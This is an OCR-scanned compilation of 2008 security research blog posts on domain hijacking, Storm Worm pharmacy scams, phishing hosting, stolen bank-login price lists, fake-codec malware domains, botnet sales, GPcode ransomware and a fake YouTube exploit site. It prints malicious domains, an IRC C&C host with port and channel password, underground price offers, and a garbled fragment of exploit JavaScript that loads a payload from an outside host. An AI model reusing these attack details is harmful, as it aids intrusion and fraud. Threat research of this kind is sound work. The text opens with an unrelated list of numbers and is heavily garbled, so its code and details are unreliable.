489649272 
489764815 
489868 
489874 
489895837 
489911002 
489925105 
4899382 
4899465 
4900005 
490000529 
490032235 
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490106919 
490130479 
490307 
490337392 
490559071 
490602119 
490622351 
490715347 
490761118 
490774 
4907741520939163 
49124310 
491243108 
491350410 
491407672 
4914332 
491498512 
4916100 
491635394 
491695 
4916960 
491815944 
491861664 
491925630 
491969371 
492036000 
492051 
492057732 
492108903 
492277 
492284475 
49236320 
492368457 
492446060 
492452744 
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492453175 
492727 
492771724 
492956651 
492988 
492988148 
493031810 
493144 
493294422 
493344927 
493573 
493621264 
493652612 
493933332 
494310675 
494321910 
494494499 
494518932 
494616876 
494696901 
494776555 
494797250 
4948706 
494949 
494960950 
495126853 
495260250 
495346212 
495358727 
495443826 
495458440 
495501224 
495570654 
495733877 
495809657 
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495811 
495833640 
495843 
495843602 
495948452 
495955 
495961142 
495975986 
495995 
496004382 
49603291 
496046 
496057391 
496066076 
49606622 
496069778 
496121025 
496197636 
496258363 
496464 
496513867217182 
496514221 
496537554 
496568196 
496571707 
496667 
496686944 
4967232 
496777777 
496785 
496899077 
497067288 
497125715 
497202306 
497272 
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49730397 
497391717 
497435 
4974755 
497507 
497551833 
497607120 
497849 
497956618 
498000222 
498108416 
498129711 
498208792 
498222021 
498285582 
498294758 
498296706 
498299658 
498383332 
498444811 
498564561 
49861 
498614395 
498639434 
498701 
498856221 
499033801 
499044347 
499055055 
49906119 
499155228 
499204299 
499307648 
499360368 
499388687 
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499399 
499415 
499520 
499525196 
499626048 
499626629 
499657 
499704275 
499714452 
499727113 
499777428 
499839065 
499949099 
499949999 
49999589 
49999950 
5000000 
5000390 
5000600 
500075 
500080 
500105 
500186 
500389 
500400 
5005000 
5005251 
5005848 
500590 
5006060 
5006776 
500698 
5007407 
5008110 
5008888 
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Domain Registrations, 
Comcast 


kryogenicsdefiant@gmail.com 


Defiant still raping 2k8 ebk 


69 dick 
tard lane 


dildo room 
PHILADELPHIA, PA 19103 


US 
4206661870 fax: 6664200187 


The hacked page was loading from the following locations : 
freewebs.com/buttpussy69 

freewebs.com/kryogeniks911 

defiants.net/hacked.html 


[3]Comcast’s comments : 

"Last night users attempting to access Comcast.net were temporarily redirected to another 
site by an unauthorized person," he says. "While that issue has been resolved and customers 
have continued to have access to the Internet and email through services like Outlook, 
some customers are currently not able to access Comcast.net or Webmail." Douglas says that 
network engineers continue to work on the issue. "We believe that our registration information 
at the vendor that registers the Comcast.net domain address was altered, which redirected 
the site, and is the root cause of today’s continued issues as well," he says. "We have alerted 
law enforcement authorities and are working in conjunction with them. " 


[4]Network Solutions comments : 

" Somebody was able to log into the account using the username and password. It was an 
unauthorized access," said spokeswoman Susan Wade. "It wasn’t like somebody hacked into 
it. The Network Solutions account was not hacked. "They ping us and say this is my domain 
and say, ‘I'd like to reset my password,’" Wade said. "It could have been compromised through 
e-mail. They could have gotten it if they acted as the customer. We’re not clear. " 


"Pinging a domain registrar" has been around since the early days of the Internet, and 
it’s obviously still possible to socially engineer one in 2008. A recently released ICANN 
advisory on the topic of [5]registrar impersonation phishing attacks provides a decent 
overview of the threat, and in Comcast’s case, | think someone impersonated Comcast in 
front of Network Solutions compared to the other way around, namely someone phished 
the person possessing the accounting data at Comcast, by making them think it’s Network 
Solutions contacting them. 


With Comcast.net now back to normal 


, the possibilities for abusing the redirected traffic given that the content was loading from 
web sites they controlled are pretty evident. And despite that there are speculations [6]the 
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hijack is courtesy of the BitTorrent supporters, in this case, the motivation behind this seem 
to have been to prove that it’s possible . 


UPDATE : 


[7]An interview with the hijackers including a screenshot of the control panel for over 200 
Comcast operated domains is available. 


1. bttp://www.scmagazineus.com/Justin-Timberlake-Hilary-Duff-Tila-Tequila-MySpace-profiles-compromised-to-im 


press-hacker-group/article/99727/ 
2. http://blogs.zdnet.com/security/?p=121 
3. http: //www.dslreports.com/shownews/Comcast-Domain-Hacked-94826?nocomment=1 


4. http://blog.wired.com/27bstroke6/2008/05/comcast-servers.htm 
. http://blogs.zdnet .com/security/?p=1208 


6. http: //torrentfreak.com/comcast-hacked-in-bittorrent-throttling-packback-080529/ 


7. http://blog.wired. com/27bstroke6/2008/05/comcast-hijacke.htm 


4.5.33 Storm Worm Hosting Pharmaceutical Scams (2008-05-30 21:05) 


Top Storm Domains 


Total IP Coun 


May 22 2008 05:10AM 


May 30 2008 02:124M 


May 30 2008 02:12AM 


tellicolakerealty.cn NOE MiMay 30 2008 06:19PM 
orintlength.com May 30 2008 02: 124MEMay 30 2008 08:29AM 
destroythemoon.com Feb 1S 2008 12:344M Apr S 2008 02:11PM 202 
ibank-halifax.com Jan 12 2008 11:37PM Mari8 2008 03:30PM 120955 
moonstarfood.com Feb 14 2008 01:44PM Feb 20 2008 12:31PM 10 
postcards-2008.com Dec 30 2007 06:43PM Jan 9 2008 03:30PM 14123 


With Storm’s [1]recent SQL injection and introduction of several new domains within, the very 
latest additions to their domain portfolio are the following domains (naturally in a fast-flux 
provided by already infected hosts) hosting pharmaceutical scams : 
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producemorning.com 


pressrose.com 


posestory.com 


picturewe 
st.com 
lowsmell.com 
catsharp.com 
printlength.com 


European C5 Pharmacy 


tito 


Pain Reve@Muscle Retaxant 
Healthy Bones 


All prodects Q Contact ws ISO BUR OBP CAD AUD OF 


You Cart! 40.08 (0 tems) 
Preceed te Checheek 


Special Offer 
Free Viagra samples 


& pilts fo 


Seomhbyeame: CEC RELRHISELWMERESESIT Ue were Seats | Se 


Today's Bestsetiers 


cad 
@: 
iS 


All of the domain’s DNS entries are set to update every 2 minutes, meaning they every 2 
minutes another 20 different and infected IPs will be hosting the domains, which on the other 


hand logically have identical WHOIS entry records : 


Administrative Contact: 


WenFeng 


NO.397,zhuquedadao street,xian 
City,shanxi Province 


xi an Shanxi 710061 
CN 

tel: 298 5228188 
fax: 298 5393585 


yayun22@163.com 


producemorning.com producemorning.com 


catsharp.com 


printlenath.com 


com 
om 
com 
om 
producemorn 1ing.com re om 
producemorning.com 2.com 
producemorning.com 4 se.com 
producemorning.com 
producemor ning.com 
lowsmell.com 
lowsmell.com 
lowsmell.com 


lowsmell.com 


printlength.com 
printlength.com 
printlength.com 
printlenath.com 
printlength.com printlength.com 
producemorning.com printlength.com 
producemorning.com printlength.com 
printlenath.com printlength.com 


producemorning.com printlength.com 


woducemorning.com rintlength.com 


It’s also worth pointing out how they emphasize on the benefits of SSL based transactions, 
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when none of the sites is supporting SSL, but is doing something a great number of phishers do 
- they’ve changed the favicon to a key lock looking one, since maintaining a SSL infrastructure 
on the infected hosts is both, unpragmatic, and a bit unnecessary if they social engineer the 
visitor : 


" SSL Encryption or Https is a technique used to safeguard private information which is 
sent via Internet. To prove the site’s legitimacy, the SSL encryption uses a PKI (Public Key 
Infrastructure) - public/private key, to encrypt IDs, documents, or messages to securely 
transmit the information in the World Wide Web. In order to show that our transmission is 
encrypted, most browsers will display a small icon that would look like a pad "lock" or a key 
and the URL begins with "https" instead of "http". SSL Encryption or https from a digital 
certification authority will helps the secure web site with confidential information on web. " 


e ° = @ 0) Petz iipressrose.comfprocest_order chp - G- y. 


wi Mot Visted __ Seat Bookmart: 


We accept 
visa & > & | ope cece | 
Page Inte - http: /ipressrese.com/process_order.php 


oF tj a 


Greed Meds Perenees Seosty 


SECURE ORDER FORM 


Web Sie Identity 
Web she pressrosecom 
Owner Ths web site does not supply identity information. 
Ver fied by: met spec itied 


Privacy © History 

Hove I veined thes web ste Before today? 

ts thes wed ste toring Information (cookies) on my 
comeuter? 

Were | sareed are passwords for thes mab ste? 


No 
ves [verm coats J 
™o 


Technical Cetats 
Connection Not Imcrypted 
The web ste presarose. com Goes not support eneryption for the page pou are Merwin. 

Infermanon sent over the Internet without encryption can be seer by other people while & 6 im trans. 


With pharma masters increasingly using [2]fast-flux to increase the survivability of their 
domains participating in affiliation based [3]pharmaceutical affiliate programs, Storm Worm is 
anything but lacking behind programs that connect scammers and [4](infected) infrastructure 
providers. 


Related posts: 

[5]AIl You Need is Storm Worm’s Love 
[6]Social Engineering and Malware 

[7]Storm Worm Switching Propagation Vectors 
[8]Storm Worm’s use of Dropped Domains 
[9]Offensive Storm Worm Obfuscation 
[10]Storm Worm’s Fast Flux Networks 
[11]Storm Worm’s St. Valentine Campaign 
[12]Storm Worm’s DDoS Attitude 
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[13]Riders on the Storm Worm 
[14]The Storm Worm Malware Back in the Game 


. http: //ddanchev. blogspot .com/2007/10/fast-flux-spam-and-scams-increasing.htm 


. http: //ddanchev. blogspot .com/2007/10/incentives-model-for-pharmaceutical.htm 
: S?do=threats&subdo=storm_tracke 


. http: //ddanchev. blogspot .com/2008/05/all-you-need- is-storm-worms-love.htm 


. http: //ddanchev. blogspot .com/2007/01/social-engineering-and-malware.htm 


ct ct 
ct ct 
ue] ue) 
~N ~N 
~ ~N 
eH Q 
cH Q 
eH o 
: B 
ct a 
4 a 
c O) 
n < 
et . 
0) ion 
Q e 
n ° 
° {je} 
<j n 
5 ue] 
fa) fe) 
(0) ct 
° fa) 
a} fe} 
(ie) B 
N ~N 
| N 
co} 
2} 
for) 
~N 
fo) 
a 
~N 
i) 
= 
i 
° 
i= 
Bb 
Oo) 
to) 
Q. 
Hb. 
n 
n 
ct 
° 
aI 
B 
sg 
° 
8 
B 
n 
H 
° 
a 
0) 
img 
ct 
B 


. http: //ddanchev. blogspot .com/2007/08/storm-worms-use-of-dropped-domains . htm 


. http: //ddanchev. blogspot .com/2007/08/offensive-storm-worm-obfuscation.htm 
http: //ddanchev. blogspot. com/2007/09/storm-worms-fast-flux-networks .htm 


http: //ddanchev.blogspot.com/2008/01/storm-worms-st-valentine-campaign.htm 
. http: //ddanchev. blogspot .com/2007/09/storm-worms-ddos-attitude.htm 
. http: //ddanchev.blogspot .com/2007/12/riders-on-storm-worm.htm 


14. http: //ddanchev.blogspot.com/2007/08/storm-worm-malware-back- in-game .htm 
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4.6 June 


4.6.1 U.K’s Crime Reduction Portal Hosting Phishing Pages (2008-06-02 07:20) 


Home | Chi siamo | Sala stampa | English Registrazione . necedi & 


DI COSA HAI BISOGNO? PRODOTTI BUSINESS | SMSERVIZI ONLINE © 


Misure di sicurezza 


Carte postepay 
Saldo ash eo as 

Inserisca i dati relativi alla sua carta Postepay nel caso non avesse una carta postepay ma un conto 
Lista movimenti BancoPosta lasci in bianco e clicchi su continua. 
Ricarica carta 
Bollettine 
Ricariche telefoniche 


’ Numero della carta postepay: 
. .BancoPostaonline 1 


Scadenza mm/aa: 


/ 


CVUV2/CVC2: Visualizza la posizione 
del codice CVV2/CVC2 


sulla carta » 


Continua > 


Contattaci | Privacy | Mappa | Trasparenza bancaria | Forniture e gare | Scadenzario fiscale | © Poste Italiane 2007 


http: //wew.crimereduction. homeoffice.gov.uk/alcoholorders/Archive070410/poste/cartepr/confirmcarta.phot 


Poste Italiane seems to have relocated to a brand new location online, in this 
case the U.K’s Crime Reduction Portal which is currently hosting a phishing page - 
crimereduction.homeoffice.gov.uk/alcoholorders/Archive0 70410/poste/cartepr 


What’s special about this incident is that it’s becoming increasingly common to come across 
phishing sites that have been [1]remotely-file-included or SQL injected at vulnerable sites. In 
ca you remember, [2]the Police Academy in India too, used to host phishing pages in the past. 
The irony in both cases is highly visible, and for good or bad, it’s anecdotal cases like these that 
are supposed to build awareness on the adapting tactics phishers use nowadays - forwarding 
the responsibility for hosting as well as managing a shadow infrastructure like this one for 
instance. 


1. http://ddanchev. blogspot .com/2008/04/phishing-tactics-evolving. htm 
2. http: //www.f-secure.com/weblog/archives/00001289. html 
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4.6.2 Price Discrimination in the Market for Stolen Credit Cards (2008-06-03 13:15) 


What are the bank logins and credit cards available? 


Some Of US \ UK Banks Available Now 


e For United States Of America Banks 


Preview 
[ taaknames [face [ce | Ray 


Bank Of America | Between 2k-50k | 400$ ~~ || ~— Download _— 
WellsFargo Between 4k - 40k 


-40k | 300 | Download 
| Chase Bank _| Between 2k-30k | 250 | ~— Download __— 
| Citibank __—i| Between 9k-70k | 300 ~~ |_~— Download _— 
| _Wachovia___| Between 2k-18k | 275 | ~— Download _— 


* For United Kingdom Banks 


Preview 


Barclays | __—AnyBalance_ | ——400$_~—s | Download 


7 400$ up to 
sec |eetween30k- aia) A008 uP 


Halifax Between 20k - 180k Download 
Nationwide _ [Between 15k-230k| 450 =| ~— Download _—sC 
Lloyds TSB _ [Between 10k- 400k] —-600$_~——s[__—Download_—_—si 


If You Are Not Able To Raise The Amount For Any Of The Logins. I Can Make For You Any 
Transfer To Any Bank Listed With Upfront 250$ And My Share 20% 


Payments With : E-gold, Western Union, Moneygram, Moneybookers. 


What would be the price of a stolen credit card with an already verified balance, and based 
on what factors would the sellers come up with the price range? Depends on who you’re 
buying the goods from. Continuing the discussion on the [1]Underground Economy’s Supply 
of Goods, the service I'll comment on in this post is among the countless number of others 
offering stolen credit card numbers, however, in this one we have [2]a great example of price 
discrimination compared to the majority of other propositions, emphasizing on a volume basis 
propositions - the more you buy the cheaper it gets. 


Let’s go through this proposition differentiating itself on the basis of the balance avail- 
able on a per bank basis : 


- Bank Of America/Between 2k - 50k/400 $ 


- WellsFargo/Between 4k - 40k/300 $ 
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- Chase Bank/Between 2k - 30k/250 $ 

- Citibank/Between 9k - 70k/300 $ 

- Wachovia/Between 2k - 18k/275 $ 

- Barclays/Any Balance/400 $ 

- HSBC/Between 30k - 312k/400 $ up to 100k=600 $ 
- Halifax/Between 20k 180k/450 $ 

- Nationwide/Between 15k - 230k/450 $ 


- Lloyds TSB/Between 10k - 400k/600 $ 


How they come up with these prices remains a subject to speculation, what’s important 
to point out is that in between the price discrimination used here on a good that in reality is 
a commodity good, is that they’re cashing-in on the high profit margins since when investing 
the time and efforts into stealing these credit card numbers though banker malware infected 
PCs, they weren’t even aware of what their ROI would be, consequently any price set would 
be a profitable price outpacing the investments they’ve made into obtaining the accounting 
data. 


We can also theoretically have the same seller making propositions on a volume basis, 
operating another site this time targeting different marketing segment, where the site itself 
would have also been advertised to reach that very segment. What he’s enjoying is the overall 
lack of market transparency and the fact that it’s not a daily practice for someone to come 
across sites selling stolen credit card details, which is where the first proposition would take 
place. The second, the one on a volume basis, would be targeting the experienced identity 
thieves who never even consider spending so much money on a good that they come across 
to, and have good understanding of the market, thus, Know where to find bargain deals for it. 


Who's supplying the bargain deals anyway, and how are the bargain deals affecting the 
behavior of the experienced sellers in the market? New market entrants that suddenly 
managed to get hold of huge amounts of stolen credit cards, consciously or subconsciously 
introduce [3]penetration pricing in the market. Basically, they are aware of several services 
and they prices they charge for the goods offered, so on the basis of these prices they start 
to on purposely undercutting them in order to achieve the necessary growth during the 
introduction period. 


With the ever decreasing cost required to conduct cybercrime, any investment made would 
automatically result in a positive return on investment. Moreover, for the time being, there’s 
no way we Can even consider talking about the average price for a stolen credit card number, 
as everyone is playing by their own rules, with only a few exceptions using basic market princi- 
ples. So if you even come across an article or a report stating that the price of a certain good 
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is the specific amount of money pointed out, don’t take the number of granted, as this is just 
one of the many such servics and propositons the researchers came across to, not the average. 


Ironically, just like you have publicly available backdoored versions of Mpack and Icepack 
aiming to trick the average script kiddies into providing those who backdoored the kits with 
the opportunity to hijack their successful campaigns, that’s of course next to the backdoored 
phishing pages released in the very same fashion, we also have scammers trying to scam 
other scammers by pitching the stolen credit cards and never "delivering the goods". 


1. http: //ddanchev. blogspot .com/2007/03/underground-economys- supply-of-goods.htm 


2. http://en.wikipedia.org/wiki/Price_discriminatio 


3. http://en.wikipedia.org/wiki/Penetration_pricing 


4.6.3 Blackhat SEO Redirects to Malware and Rogue Software (2008-06-05 13:38) 


= Result Protocol Host URL Body  Content-T... 
e|2 200 HTTP pormtubedirect.info } 9,420 text/html; c... 
4 200 HTTP porntubedirect.info jstyle.css 5,452 textjcss 
95 200 «HTTP porntubedirect.info fstat/count.php?kw=porn%20video 311 textjhtml; c... 
s) HTTt por edirect.int mage ogerburt Hi image/or 
(s)7 302. «HTTP 216.240.139.234 jsutrajin.cgi?3 229 text/html; c... 
s} 8 301 HTTP www.dirtyrocvids.com _findex.php7id=4078 249 text/html; c... 
e\9 200 HTTP anykindclips.com jindex.php?id=4078 50,510 text/html 
[9} 10 200 HTTP anykindclips.com /popup/pop1_2007-09-04.js7id=4078a&n=mainstream 896 text/html 
(9) 11 200 HTTP anykindclips.com /popup/pre_2007-09-04.js?id=4078&n=mainstream 585 text/html 


(9) 12 200 HTTP anykindclips.com /popup/pop2_2007-09-04.js?id=4078&n=mainstream 1,518 text/html 


CHEE EMEA CHEACACACA EAC REACACA EAA CH EACIED 


# 
1 


A black SEO farm with built-in redirection to a multitude of sites serving rogue codecs (Zlob 
malware variants) and [1]fake security software phoning back to [2]UkrTeleGroup Ltd’s 
network - could it get even more interesting? Of course, as the current state of Zlob malware 
serving tactics can be seperated in two distinct groups, those abusing the [3]"sort of" zero 
day Flash exploit, as the currently [4]Jactive SQL injection attacks are all taking advantage of 
it, and those still relying on plain simple redirect to multimedia sites requiring you to install 
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the fake codec. 
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While tracking down the [5]massive blackhat SEO poisoning campaigns that took place in 
March, 2008, as well as the countless number of embedded/injected malware campaigns tar- 
geting high profile sites that we’ve been seeing recently, it’s becoming increasingly common 
to come across a repeating malicious pattern. Basically, a [6]domain portfolio of typosquatted 
domains looking like legitimate codec sites is created, several bogus video, mostly pOrn related 
sites with no content start acting as a frontend to the codecs, where traffic is driven through 
blackhat SEO doorways. Moreover, rogue codec sites are increasing because the templates 
for the pOrn and codec sites are turning into a commodity, just like phishing pages and DIY 
phishing page generators lowering down the entry barriers into these practices. 
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Videos Categories Channels Comemunity &,) Velead 


From: usagi 
Joined 7 mort 299 
Videos 12 


Relative movies, 
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Let’s assess a sample redirection doorway, a visualization and sample traffic of which you can 
see in the attached screenshots. At porntubedirect.info we have a fake counter porntube- 
direct.info/stat/count.php loading the redirection script from 216.240.139.234/sutra/in.cgi?3 
which is a javascript serving a different site on-the-fly, courtesy of a well known blackhat SEO 
campaign tool. The output of this redirection is anew domain serving Zlob variants in the form 
of fake codecs hosted under the following domains : 


antivirus-scanonline.com 


indafuckfuck.com 
newcontents2008.com 


avwav.com 


anykindclips.com 


dirtyxxxvids.com 
clipsmachines.com 


thesoft-portal-08.com 
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Sample detecton rates for the codecs obtained : 


Scanners Result: 8/32 (25 %) 
W32/PolyZlob!tr.didr; Trojan:Win32/Tibs.gen!Ids 


File size: 119296 bytes 
MD5...: dc5538af557cb4c311cb86d6574400ba 


SHA1..: 5cf1602db8c4fdd3c5ac5101e5a6c5daa7 7f5ff1 
Scanners Result: 6/32 (18.75 %) 


Trojan-Downloader.Win32.FraudLoad.axa; Trojan.Dldr.FraudLoad.axa 


File size: 60416 bytes 


MD5...: 14938bfe35128687e05f7f8ccbd29c7d 
SHA1..: cf651e959fff945c9659321e79ba2788062b721d 


Scanners Result: 14/32 (43.75 %) 


Trojan-Downloader.Win32.Zlob.lps; TrojanDownloader:Win32/Zlob.IB 


File size: 18432 bytes 


MD5...: 963bbcd4549970a92eb1b11c46a451bb 


SHA1..: 679508aba4e547935d5e4104a735c754b40de49e 
Scanners Result: 18/32 (56.25 %) 


Trojan-Downloader.Win32.Delf.ilx; TrojanDownloader:Win32/Chengtot.A 
File size: 91683 bytes 


MD5...: 727e3f353281229128fdb1728d6ef345 
SHA1..: 3f9¢c9000b273e8bf75db322382fbaabf333faf26 


Once we’ve managed to obtain several of the fake codec domains, passive DNS monitoring 
and using third-party tools helps us expose a huge portfolio of rogue domains such as : 
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funfuckporn.com 
musicpo 
rtalfree.com 
online-dvdrip.com 
widget-porn.com 
gt-funny.com 


gt-movies.com 


gt-stars.com 
hot-sextube.com 
hot-pornotube-2008.com 
hot-pornotube08.com 
hotpornotube08.com 


porn-youtube-08.org 
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Message Box Odject Error 


Video ActiveX Cibgect Error: 
Yous be cwwser Cart Gephiry thes vee 


uriy.org 
sextube20008.com 


streamxxxvideo.com 


xxxgirlsgirls.com 
porno-tube20008.com 
2008adultstreamportal2008.com 
2008adults2008.com 
adult18tube2008.com 
sextubel8adult.com 


all-videos-home.com 


adultstreamportal2008.com 
onlinestreamvide.com 
adultvideos4all.com 
sex18tube2008.com 
adultxx-18.com 


mymediasex.com 


ladyxxxworld.com 


adultstreamportal.com 
young-girls-board.com 


porn-youtube08.net 


adultfreemarket.info 
adult-codec08.com 
adult-tubecodec08.com 
adult-tubecodec2008.com 
adulthot-codec08.com 
adulttubecodec2008.com 


hot-tubecodec20.com 
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é\ Vadeo ActeveX Object frror: 
ActiveX COyect to play the video Mle 


To downdoed and install ActiveX Object cick Continue 


media-tubecodec2008.com 
porn-tubecodec20.com 
hot-sextubecodec.com 
sexporntubecodec14.com 
sexporntubecodec32.com 
sexporntubecodec77.com 
sexporntubecodec98.com 


adult-codec08.com 


adult-codec2008.com 
adult-tubecodec08.com 
adult-tubecodec2008.com 
adulthot-codec08.com 


adulthot-codec20008.com 
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adulthot-codec2008.com 
adulthotcodec032008.com 
adulthotcodec072008.com 
adulthotcodec092008.com 
adulthotcodec29018.com 
adulthotcodec29098.com 
adulttubecodec2008.com 
media-tubecodec2008.com 
sexhotcodec09.com 
sexhotcodec1.com 
sexhotcodec11.com 
sexhotcodec12.com 
sexhotcodec90.com 
thehotcodec21.com 
thehotcodecgt.com 


thehotcodechq.com 


thehotcodeclk.com 


thehotcodecrt.com 
thehotcodecxx.com 


thehotcodeczz.com 


What you see is not always what you get online, however, the infrastructure providers 
in the majority of malware campaigns tend to remain the same. 


. http://ddanchev. blogspot . com/2008/05/got- your-xpshield-up-and-running. html 
. http: //ddanchev. blogspot . com/2008/02/geolocating-malicious-isps.htm 
. http: //ddanchev. blogspot .com/2008/05/malware-attack-exploiting-flash-zero.htm 


1 
2 
3 
4. http://ddanchev. blogspot . com/2008/05/yet-another-massive-sql-injection.htm 
5 
6 


ttp://ddanchev .blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.htm 


. http: //ddanchev. blogspot. com/2008/03/portfolio-of-fake-video-codecs.htm 
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4.6.4 Using Market Forces to Disrupt Botnets (2008-06-09 10:53) 
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There’s never been a shortage of radical approaches for[1] disrupting the most successful 
botnets, but a surplus of ethics on behalf on researchers as well as a lack of an internationally 
implemented legislation on who, how and when should be given a mandate to do so. 


Basically, country A doesn’t really want country B’s security researchers messing up with 
the infected hosts in the country citing cyber espionage fears, despite that the researchers’ 
intentions remain purely the result of their capabilities to make an impact. And self-regulation 
in times when the average Internet user wants her Web 2.0 experience, and doesn’t really 
feel comfortable trying to understand what the latest SQL injection has to do with, is so 
unpragmatic that it makes me wonder why is everyone so obsessed in trying to measure how 
many PCs are malware infected out of a given number. In reality, what should be measured 
in order to emphasize on the degree of which malware introduced by multiple parties is 
managing to infect a PC, is with how many different instances of malware is a single PCs 
infected in a particular moment of time. Now, go perform a forensics audit on a PC which 
on behalf of the over ten different pieces of malware, is responsible for fraudulent Ebanking 
transactions, hosting of phishing pages, participating in fast-flux networks that were once 
serving scams and the next time live exploit URLs, a daily reality for a countless number of 
forensics experts. 


How could market forces be used to disrupt botnets anyway, and how relevant would 
this approach be in a real-life situation? As every other [2]underground market propostion, 
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buying botnets is no different than buying stolen credit cards, as long as your have multiple 
propositions to take into consideration, where the price ranges often vary over 100 % between 
the offers. With the [3]increasing supply of botnets for sale, and degree of price differentiation, 
a certain country can easily buy direct access to [4]request a botnet on demand with infected 
hosts within the country only and do whatever they want with them - in this case perhaps 
fortify and patch the host, upon forwarding it to the several online malware scanners to ensure 
they won’t have to rebuy access to it again. Security radicalization like in this case, is an often 
misinterpreted term which when applied in a free market economy can ruin a lot of, perhaps, 
broken business models, but will also contribute to the development of new market segments. 
Hand me the botnet menu, please : 


bd . a, . wre w aa MY it 4 o %e! "st 6* 
. eet - a2" SS ve enee *: = aes 
-* . —— ~ . . e* ~~ 
os i -“ © ¢ . ba ee af “s . 
Fo —=. a - = Ours 
. 3 ° a - Tat 
--,f SSSs::. ea: egutie, ee 
a . -* 
as ’ 


For instance, 1000 bots go for $25 bucks, there are however propositions offering 10,000 bots 
for $50 bucks, theoretically, as there’s always the suspicion that they won’t deliver the goods 
and you'll end up with a situation where scammers scam the scammers, for $1000 you can 
buy a 100k infected PCs, and for another $100,000 a million infected PCs. So what? Well, 
establishing a task force to periodically purchase already infected PCs and disinfecting them, 
of course, in a opt-in fashion on behalf of the end users in order to please the paper tigers, 
stating that if their government can magically help them fight malware, they’re interested, is 
one of the many ways market forces could be used to directly mess up with the oversupply of 
botnets for sale. 


The question is perhaps not how realistic this is since both the service and the direct 
contact approach are there, but how important such a perspective is for anything cybercrime 
at the bottom line, since cybercrime has long stopped increasing, it’s basically reaching a 
stage beyond efficiency and turning into an easily outsourceable process, with the lowest 
entry barriers to participate in it ever. 
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1. http: //honeyblog.org/archives/172-Polluting-Storm. html 


2. http: //ddanchev. blogspot .com/2008/06/price-discrimination-in-market-for.htm 


3. http: //ddanchev. blogspot .com/2007/10/botnet-on-demand-service.htm 


GP-CRYPT Decryptor fe | 
GP-CRYPT Decryptor 


1 ) Decrypting complete. 


Files decrypted : 


Total encrypted size : 
Files : 


Current ; 


So, the ultimate question - [1]who’s behind the GPcode ransomware? It’s Russian teens 
with pimples, using E-gold and Liberty Reserve accounts, running three different GPcode 
campaigns, two of which request either $100 or $200 for the decryptor, and communicating 
from Chinese IPs. Here are all the details regarding the emails they use, the email responses 
they sent back, the currency accounts, as well their most recent IPs used in the communication 


Emails used by the GPcode authors where the infected victims are supposed to contact them 


content715@yahoo.com 
saveinfo89@yahoo.com 
cipher4000@yahoo.com 
decrypt482@yahoo.com 


Virtual currency accounts used by the malware authors : 
Liberty Reserve - account U6890784 

E-Gold - account - 5431725 

E-Gold - account - 5437838 
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Sample response email : 
" Next, you should send $100 to Liberty Reserve account U6890784 or E-Gold account 5431725 
(www.e-gold.com) To buy E-currency you may use exchange service, see or any other. 


In the transfer description specify your e-mail. After receive your payment, we send decryptor 
to your e-mail. For check our guarantee you may send us one any encrypted file (with cipher 
key, specified in any ! READ ME !.txt file, being in the directorys with the encrypted files). 
We decrypt it and send to you originally decrypted file. 


Best Regards, 


Daniel Robertson " 


Second sample response email this time requesting $200 : 

"The price of decryptor is 200 USD. For payment you may use one of following variants: 1. 
Payment to E-Gold account 5437838 (www.e-gold.com). 2. Payment to Liberty Reserve account 
U6890784 (www.libertyreserve.com). 3. If you do not make one of this variants, contact us for 
decision it. For check our guarantee you may send us ONE any encrypted file. We decrypt it 
and send to you originally decrypted file. For any questions contact us via e-mail. 


Best regards. 
Paul Dyke " 


So, you’ve got two people responding back with copy and paste emails, each of them 
seeking a different amount of money? Weird. The John Dow-ish Daniel Robertson is emailing 
from 58.38.8.211 ( Liaoning Province Network China Network Communications Group Corpo- 
ration No.156,Fu-Xing-Men-Nei Street, Beijing 100031 ), and Paul Dyke from 221.201.2.227 
( Liaoning Province Network China Network Communications Group Corporation No.156,Fu- 
Xing-Men-Nei Street, Beijing 100031 ), both Chinese IPs, despite that these campaigners are 
Russians. 


Here are some comments | made regarding cryptoviral extortion two years ago - [2]Fu- 
ture Trends of Malware (on page 11; and page 21), worth going through. 


1. 
2. http: //packetstormsecurity.org/papers/general/malware-trends. pdf 


4.6.6 ImageShack Typosquatted to Serve Malware (2008-06-11 15:12) 


This is ironic because you have one of the most popular image sharing sites typosquatted, 
and malware served by copying ImageShack’s directory structure, next to using spoofed 
image files which are the actual executables - "[1]Fake ImageShack site serving malware, links 
distributed over IM" 


" The real ImageShack site is imageshack.us , however, the malware authors are imper- 
sonating ImageShack and using imageshaack.org 
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(64.74.125.21) , in particular 


imageshaack.org/img/Picture275.jpg, which is where the malware is. Once the user gets 
infected with the malware, Backdoor.Win32.SdBot.eiu in this case, the host joins an IRC 
channel where the botnet masters continue issuing commands for the campaign to spread " 


Scanners Results : 14/32 (43.75 %) 
Backdoor.Win32.SdBot.eiu; a variant of Win32/Injector.AV 
File size: 31040 bytes 

MD5...: eef33ca4036a5bf709f62098c55fb751 

SHA1..: 5e7bdde09c760031c0a29ccObb2ee2503aff3bf3 


The malware then connects to simplythebest.mydyn.net:6532 (81.169.171.145) joining 
channel #99993333 with password plasmal1991 , acting as the C &C for this campaign 
spreading over MSN. 


1. http: //blogs.zdnet .com/security/?p=1266 


4.6.7 Fake YouTube Site Serving Flash Exploits (2008-06-12 13:25) 
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Y Text Comments (1,10 Post Text Comment 


Originally mentioned by the folks at Sunbelt, this [1]fake YouTube site happens to be a bit 
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more interesting than it seems at the first place : 
" Clicking on that link then redirects to a different site, youtube-s, which serves exploits 


to attempt to infect your system. Then, if your browser hasn’t completely crashed at that 
point, you may ultimately get redirected to the real YouTube, displaying some idiotic video (he 


nce, possibly even helping to continue the infection, by having users forward the spam above) 


Interesting mostly because it not just attempts to serve a online games password stealer 
through exploiting the ubiquitous MDAC exploit, but is [2]also serving a flash exploit which 
when analyzed leads us to a web based C &C of new malware kit. And although I’ve been 
aware of its existence for a while now, it’s the first time | see it in action. 


Upon analyzing yout 


ube-r.com (211.95.79.57) a couple of days ago, it’s now returning a 403 forbidden message, 
however, copies of the malware have already been obtained and analyzed. In between 
attempting to infect with MDAC at youtube-s.com/load.php?id=912 ; the flash exploit loads 
from a9rhiwa.cn/update _files/1.swf , and while this is happening the end user is redirected to 
the real YouTube site. Some sample detection rates : 
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var m=new Array() 
ar m0: 


yar url="http://youtube-s.com/load. php7id=912" 
function hex{num width} 


var hex=dig 


while(num>Uxr }f 


} 
var width=(width?width:O 


mile(hex lenqth<width 


return nex: 


function addr{addr) 
retum unescape(” %u" +he 


function unesistr} 


var tmp=" 


Scanners result : 7/32 (21.88 %) 


TR/Crypt.ULPM.Gen; Mal/EncPk-CO 

File size: 8704 bytes 

MD5...: cb8611db343067e1fb663ab6ee671114 

